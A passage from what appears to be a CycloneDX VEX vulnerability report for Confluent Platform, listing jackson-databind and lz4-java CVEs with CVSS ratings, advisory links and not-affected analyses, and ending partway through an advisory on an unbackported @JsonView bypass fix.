          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ed39dfdb-395c-4d98-a3f6-f3bbae960502"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8a946054-d4de-4fae-be17-c8def7953482"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e272d2d7-ad51-44fe-ad2f-78acb7605ccc"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#e1daa1f8-3fbc-466d-bdfa-3606171f026b"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#27722e9c-480d-463c-9471-3e28fff661ce"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#d1a8375b-7e80-4a4b-9a19-e5181eec10bb"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#c2d8b33e-2a7c-4028-9a5f-d0a149bf6a68"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#91781c8e-7326-4ffd-aa21-e9a4bed6aa64"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f9bc8a73-638a-436a-b948-1b57cd1a3738"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#0df291d2-a463-48a8-8a00-212c73132383"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c59920ed-da76-4143-86fb-af4890d96240"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#fe3ca0fc-606d-4691-9791-677398b734ba"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3b2fc3d8-256a-4379-8c7a-46bfd2080520"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. @JsonView is not used in the product, so the setterless-creator @JsonView bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-54518",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        863
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.21.0 until 2.21.4 and 3.1.4, UnwrappedPropertyHandler.processUnwrappedCreatorProperties() replays buffered JSON into creator parameters but never consults prop.visibleInView(activeView). The normal property-based creator path gates creator properties on the active view, but this unwrapped-creator replay path bypasses that check, so a constructor parameter annotated with both @JsonView(AdminView.class) and @JsonUnwrapped is populated from attacker JSON even when a more restrictive view is active. This vulnerability is fixed in 2.21.4 and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.21.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54518"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54518"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/721fa07ebbd4aab4a659a1a68940878315c3e341"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/d633bc038f200c1397c07f1a2b46f58e72c91eea"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5971"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5973"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-rcqc-6cw3-h962"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54518"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54518"
        }
      ],
      "published": "2026-06-23T22:16:32+00:00",
      "updated": "2026-06-27T20:49:30+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ed39dfdb-395c-4d98-a3f6-f3bbae960502"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8a946054-d4de-4fae-be17-c8def7953482"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e272d2d7-ad51-44fe-ad2f-78acb7605ccc"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#e1daa1f8-3fbc-466d-bdfa-3606171f026b"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#27722e9c-480d-463c-9471-3e28fff661ce"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#d1a8375b-7e80-4a4b-9a19-e5181eec10bb"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#c2d8b33e-2a7c-4028-9a5f-d0a149bf6a68"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#91781c8e-7326-4ffd-aa21-e9a4bed6aa64"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f9bc8a73-638a-436a-b948-1b57cd1a3738"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#0df291d2-a463-48a8-8a00-212c73132383"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c59920ed-da76-4143-86fb-af4890d96240"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#fe3ca0fc-606d-4691-9791-677398b734ba"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3b2fc3d8-256a-4379-8c7a-46bfd2080520"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. @JsonView is not used in the product, so the unwrapped-creator @JsonView bypass is not reachable."
      }
    },
    {
      "id": "CVE-2026-59888",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        915
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.15.0 until 2.18.8, 2.21.4, and 3.1.4, Java Records using a PropertyNamingStrategy can bypass @JsonIgnore because POJOPropertiesCollector._removeUnwantedIgnorals() records an ignored component under its original implicit name before _renameUsing() applies the naming strategy, allowing the renamed JSON key to be assigned to the Record constructor parameter. This issue is fixed in versions 2.18.8, 2.21.4, and 3.1.4.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.8, 2.21.4",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59888"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59888"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/baa2cdf5ca2b2717fbb88d91955d69d8651df3e4"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/c7c678360624da5bc7eed2152789fa522880db9d"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/5974"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-3pjw-73gf-8qr5"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59888"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59888"
        }
      ],
      "published": "2026-07-14T17:17:15+00:00",
      "updated": "2026-07-15T20:18:23+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ed39dfdb-395c-4d98-a3f6-f3bbae960502"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8a946054-d4de-4fae-be17-c8def7953482"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e272d2d7-ad51-44fe-ad2f-78acb7605ccc"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#e1daa1f8-3fbc-466d-bdfa-3606171f026b"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#27722e9c-480d-463c-9471-3e28fff661ce"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#d1a8375b-7e80-4a4b-9a19-e5181eec10bb"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#c2d8b33e-2a7c-4028-9a5f-d0a149bf6a68"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#91781c8e-7326-4ffd-aa21-e9a4bed6aa64"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f9bc8a73-638a-436a-b948-1b57cd1a3738"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#0df291d2-a463-48a8-8a00-212c73132383"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c59920ed-da76-4143-86fb-af4890d96240"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#fe3ca0fc-606d-4691-9791-677398b734ba"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3b2fc3d8-256a-4379-8c7a-46bfd2080520"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59889",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        863
      ],
      "description": "jackson-databind contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor. From 2.18.0 until 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1, UnwrappedPropertyHandler.processUnwrapped() replays buffered JSON for a @JsonUnwrapped property and calls prop.deserializeAndSet() without a prop.visibleInView(ctxt.getActiveView()) guard, allowing a property annotated with both @JsonView and @JsonUnwrapped to be written from attacker JSON under a less-privileged active view. This issue is fixed in versions 2.18.9, 2.21.5, 2.22.1, 3.1.5, and 3.2.1.",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.21.5, 2.18.9, 2.22.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59889"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/d627a8a86fcb062429282f79f3f256f181ed2c7b"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/issues/6060"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/pull/6056"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-5gvw-p9qm-jgwh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59889"
        }
      ],
      "published": "2026-07-14T21:17:06+00:00",
      "updated": "2026-07-16T16:19:15+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2",
          "versions": [
            {
              "version": "2.21.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a6beed9c-6ff1-4b5c-893e-cff8f44e2bc1/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#ed39dfdb-395c-4d98-a3f6-f3bbae960502"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a87f064b-ed47-4786-b3b6-55b4d706f212/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:a94ac2ba-d8a1-4b19-9452-81f32bef7967/1#8a946054-d4de-4fae-be17-c8def7953482"
        },
        {
          "ref": "urn:cdx:f33a27b8-0294-423c-85bb-8d008dbc42b5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#e272d2d7-ad51-44fe-ad2f-78acb7605ccc"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#e1daa1f8-3fbc-466d-bdfa-3606171f026b"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#27722e9c-480d-463c-9471-3e28fff661ce"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#d1a8375b-7e80-4a4b-9a19-e5181eec10bb"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#c2d8b33e-2a7c-4028-9a5f-d0a149bf6a68"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#91781c8e-7326-4ffd-aa21-e9a4bed6aa64"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#f9bc8a73-638a-436a-b948-1b57cd1a3738"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#0df291d2-a463-48a8-8a00-212c73132383"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#c59920ed-da76-4143-86fb-af4890d96240"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#fe3ca0fc-606d-4691-9791-677398b734ba"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#3b2fc3d8-256a-4379-8c7a-46bfd2080520"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.21.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59949",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "yawkat LZ4 Java provides LZ4 compression for Java. Prior to 1.11.1, JNI-backed XXHash implementations fail to validate the byte array object and the off and len arguments in XXHashFactory.nativeInstance().hash32().hash(), XXHashFactory.nativeInstance().hash64().hash(), XXHashFactory.nativeInstance().newStreamingHash32().update(), and XXHashFactory.nativeInstance().newStreamingHash64().update(), allowing null arrays or oversized ranges to reach native code, read outside the Java array, and fatally terminate the JVM. This issue is fixed in version 1.11.1.",
      "recommendation": "Upgrade at.yawk.lz4:lz4-java to version 1.11.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59949"
        },
        {
          "url": "https://github.com/yawkat/lz4-java"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/commit/dbd86d04b8dd716e1c2bc626be54189997d910da"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/releases/tag/v1.11.1"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/security/advisories/GHSA-xx22-p4ch-683r"
        }
      ],
      "published": "2026-08-18T15:16:56+00:00",
      "updated": "2026-08-18T18:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:maven/at.yawk.lz4/lz4-java@1.10.2",
          "versions": [
            {
              "version": "1.10.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:0e4b26f6-09d2-4380-b0de-d13c030e4632/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:97f40155-6de1-49d5-85ea-a43f5b21173d/1#b145a2d0-c9c9-42d0-883c-e0da1f684e21"
        },
        {
          "ref": "urn:cdx:3e1b0cbb-ddc1-488c-9ea4-fd5f77e389f6/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:9fc7ebf0-ec8c-4ba4-a840-63aaa92292d1/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:dd368600-41e9-4f9c-a3a9-a57d553f7811/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:cc235716-0c14-4efd-8cbd-813bdceb5126/1#dbaa0100-ded0-4b82-9f6e-dca78934ef15"
        },
        {
          "ref": "urn:cdx:45ff6c38-ee84-449c-975a-fe834e45f2ae/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:ff7345e2-0d0a-4bab-a534-ed295a416b98/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#f2e7d209-7b61-4bb4-bacb-7a3e878bc4f6"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#5475ffa3-0df1-40ce-a235-b1e71487ef6c"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#867f3e69-d369-425a-8089-ff4b04986349"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#b39f7d1b-6e32-4ce6-ac4b-6b2433061fba"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#c76a6c95-bbd6-446f-9a11-08e66e521e43"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Kafka's own bundled LZ4 codec, which every CP repo relies on transitively for record-batch compression, only ever calls the always-safe one-shot XXHash hash() API with non-null, internally-bounded buffers; the vulnerable streaming update() API is never called anywhere in the CP repo set."
      }
    },
    {
      "id": "GHSA-mhm7-754m-9p8w",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "description": "## Summary\n\nIn `BeanDeserializer.deserializeUsingPropertyBasedWithExternalTypeId`, the active-view (`@JsonView`) filter was applied only to the regular bean-property branch; the creator-property branch performed no `creatorProp.visibleInView(activeView)` check. A constructor parameter annotated with both `@JsonView(RestrictedView.class)` and `@JsonTypeInfo(use=Id.NAME,\n  include=As.EXTERNAL_PROPERTY)` is populated from attacker JSON even when a more restrictive view is active.\n\n  This is a patch gap. GHSA-5hh8 (CVE-2026-54517) and GHSA-rcqc (CVE-2026-54518) descriptions cover only the main property-based path and the unwrapped-creator path respectively; the external-type-id creator path was fixed on the 3.x line via #6004 (\"Extend #5969/#5971 fixes to ... external-type-id case in regular BeanDeserializer\", commit 7dc7a17, 2026-05-22) but\n  **the fix was never backported to 2.21 or 2.18**. Users on 2.21.4 and 2.18.8 who upgraded per the published advisories remain vulnerable to the same `@JsonView` bypass technique via a different code path.\n\n## Vulnerable Code Path\n\nFile: `com/fasterxml/jackson/databind/deser/BeanDeserializer.java`\nMethod: `deserializeUsingPropertyBasedWithExternalTypeId`\n\nOn 2.21.4 (and 2.18.8), the creator-property branch (around line 1125-1158) checks `creatorProp.isInjectionOnly()` and hands off to `ext.handlePropertyValue(...)` / `buffer.assignParameter(...)` without ever consulting `visibleInView(activeView)`:\n\n ```java\n  if (creatorProp != null) {\n      // [databind#1381]: if useInput=FALSE, skip deserialization from input\n      if (creatorProp.isInjectionOnly()) { ... }\n      // NO visibleInView(activeView) CHECK HERE\n      if (!ext.handlePropertyValue(p, ctxt, propName, null)) {\n          if (buffer.assignParameter(creatorProp, ...)) { ... }\n      }\n      continue;\n  }\n```\n\nOn 3.1.4, the same branch contains the additional guard (commit 7dc7a17):\n\n ```java\n   if (creatorProp != null) {\n      // [databind#5971]: must honor active view here too\n      if ((activeView != null) && !creatorProp.visibleInView(activeView)) {\n          p.skipChildren();\n          continue;\n      }\n      ...\n  }\n```\n\nThe 2.21 and 2.18 backport PRs (#6005 and #6003) only backported the main-path fixes from #5969/#5971; the external-type-id fix from #6004 was not backported. The maintainer closed #6005\n  with \"got changes merged forward, looks like it's all covered now\", but the forward-merge did not include the ExtTypeId 